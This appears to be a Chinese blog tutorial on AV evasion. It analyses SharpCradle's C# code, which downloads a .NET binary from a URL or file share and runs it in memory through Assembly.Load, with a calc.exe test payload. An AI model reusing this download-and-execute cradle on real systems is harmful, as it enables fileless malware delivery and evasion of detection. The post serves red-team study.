免杀基础–Assembly.Load

暗刃实验室 253 9月 05, 2022 0 adminwiki

0x00 介绍

从内存加载执行始终是我们的追求的目标，得益于C#高级语言的特性，实现这个目标相当简单。C#反射加载方法Assembly.Load就是其中一个，多数使用C#开发的C2使用了该方式，相对于的C/C++的反射加载技术简单多了，beacon端也少了很多被检测的特征。

0x01 基础知识

在使用Assembly.Load之前，Assembly对象还有几个类似的方法：Assembly.LoadFrom()和Assembly.LoadFile()

Assembly.Load()、Assembly.LoadFrom()和Assembly.LoadFile()的区别

Assembly.Load()是从String或AssemblyName类型加载程序集，可以读取字符串形式的程序集，也就是说，文件不需要写入硬盘
Assembly.LoadFrom()从指定文件中加载程序集，同时会加载目标程序集所引用和依赖的其他程序集

例如：

Assembly.LoadFrom("a.dll")，如果a.dll中引用了b.dll，那么会同时加载a.dll和b.dll

Assembly.LoadFile()也是从指定文件中加载程序集，但不会加载目标程序集所引用和依赖的其他程序集

例如：

Assembly.LoadFile("a.dll")，如果a.dll中引用了b.dll，那么不会加载b.dll

0x02 代码实现分析

参考开源代码：https://github.com/anthemtotheego/SharpCradle

SharpCradle支持从Web(http/https)或文件共享下载二进制文件并在内存中加载，也可以下载csproject编译执行。

获取执行文件

if (args[0] == "-f" & args[1] == "-c")
{
    domain = args[2];
    uname = args[3];
    password = args[4];
    folderPathToBinary = args[5];
    cmd = args.Skip(6).ToArray();                    
}
using (new Impersonation(domain, uname, password))
{
    //Access folder and read the bytes from the binary file
    FileStream fs = new FileStream(folderPathToBinary, FileMode.Open);
    BinaryReader br = new BinaryReader(fs);
    byte[] bin = br.ReadBytes(Convert.ToInt32(fs.Length));
    fs.Close();
    br.Close();                    
    loadAssembly(bin, cmd);
}
}//End if -f
else if (args[0] == "-w")
{
object[] cmd = args.Skip(2).ToArray();
MemoryStream ms = new MemoryStream();
using (WebClient client = new WebClient())
{
    //Access web and read the bytes from the binary file
    System.Net.ServicePointManager.SecurityProtocol = System.Net.SecurityProtocolType.Tls | System.Net.SecurityProtocolType.Tls11 | System.Net.SecurityProtocolType.Tls12;
    ms = new MemoryStream(client.DownloadData(args[1]));
    BinaryReader br = new BinaryReader(ms);
    byte[] bin = br.ReadBytes(Convert.ToInt32(ms.Length));
    ms.Close();
    br.Close();
   loadAssembly(bin, cmd);
}
}//End if -w
else if (args[0] == "-p")
{
//Access web to capture, build, and execute inline CS project file
var proj = System.Xml.XmlReader.Create(args[1]);
var msbuild = new Microsoft.Build.Evaluation.Project(proj);
msbuild.Build();
proj.Close();
}//End if -p

}//End try
catch
{
Console.WriteLine("Something went wrong! Check parameters and make sure binary uses managed code");
}//End catch

内存执行EntryPoint方法

//loadAssembly
public static void loadAssembly(byte[] bin, object[] commands)
{
    Assembly a = Assembly.Load(bin);
    try
    {       
        a.EntryPoint.Invoke(null, new object[] { commands });
    }
    catch
    {
        MethodInfo method = a.EntryPoint;
        if (method != null)
        {
            object o = a.CreateInstance(method.Name);                    
            method.Invoke(o, null);
        }
    }//End try/catch            
}//End loadAssembly

测试程序

using System;
namespace TestApplication
{
    public class Program
    {
            public static void Main()
            {

                System.Diagnostics.Process p = new System.Diagnostics.Process();
                p.StartInfo.FileName = "c:\\windows\\system32\\calc.exe";
                p.Start();

            }
   }

}